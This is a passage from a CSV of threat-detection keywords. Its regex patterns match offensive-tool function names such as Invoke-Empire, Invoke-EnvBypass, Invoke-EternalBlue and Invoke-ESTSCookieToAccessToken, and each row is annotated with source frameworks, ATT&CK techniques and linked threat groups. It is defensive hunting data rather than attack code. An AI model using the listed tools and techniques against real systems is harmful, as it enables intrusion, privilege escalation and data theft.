T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - 
T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48990" "*Invoke-Empire*",".{0,1000}Invoke\-Empire.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48991" "*Invoke-EndpointProtectionCheck*",".{0,1000}Invoke\-EndpointProtectionCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","48992" "*Invoke-EnumerateAzureBlobs.ps1*",".{0,1000}Invoke\-EnumerateAzureBlobs\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure 
security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","48993" "*Invoke-EnumerateAzureSubDomains.ps1*",".{0,1000}Invoke\-EnumerateAzureSubDomains\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","48994" "*invokeenumeratelocaladmin*",".{0,1000}invokeenumeratelocaladmin.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - 
RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","48996" "*Invoke-EnumerateLocalAdmin*",".{0,1000}Invoke\-EnumerateLocalAdmin.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","48997" "*Invoke-EnumerateLocalAdmin*",".{0,1000}Invoke\-EnumerateLocalAdmin.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48998" "*Invoke-EnumerateLocalAdmin*",".{0,1000}Invoke\-EnumerateLocalAdmin.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","48999" "*Invoke-EnumerateLocalAdmin*",".{0,1000}Invoke\-EnumerateLocalAdmin.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49000" "*Invoke-EnumerateLocalAdmin*",".{0,1000}Invoke\-EnumerateLocalAdmin.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational 
awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49001" "*Invoke-EnumerateLocalAdmin*",".{0,1000}Invoke\-EnumerateLocalAdmin.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","49002" "*Invoke-EnumerateLocalAdmin*",".{0,1000}Invoke\-EnumerateLocalAdmin.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting 
Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","49003" "*Invoke-EnumerateLocalAdmin*",".{0,1000}Invoke\-EnumerateLocalAdmin.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","49004" "*Invoke-EnvBypass -Command *",".{0,1000}Invoke\-EnvBypass\s\-Command\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 
- T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49005" "*Invoke-EnvBypass*",".{0,1000}Invoke\-EnvBypass.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - 
CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-BypassUACTokenManipulation.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49006" "*Invoke-EnvBypass.*",".{0,1000}Invoke\-EnvBypass\..{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - 
BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","49007" "*Invoke-EnvBypass.ps1*",".{0,1000}Invoke\-EnvBypass\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1125","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49008" "*Invoke-EssessAgress*",".{0,1000}Invoke\-EssessAgress.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","49009" "*Invoke-ESTSCookieToAccessToken*",".{0,1000}Invoke\-ESTSCookieToAccessToken.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","1","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","49010" "*Invoke-EternalBlue*",".{0,1000}Invoke\-EternalBlue.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","49011" "*Invoke-EternalBlue*",".{0,1000}Invoke\-EternalBlue.{0,1000}","offensive_tool_keyword","empire","Empire commands. 
Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49012" "*Invoke-EternalBlue*",".{0,1000}Invoke\-EternalBlue.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 
- T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49013" "*invoke-eternalblue*",".{0,1000}invoke\-eternalblue.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - 
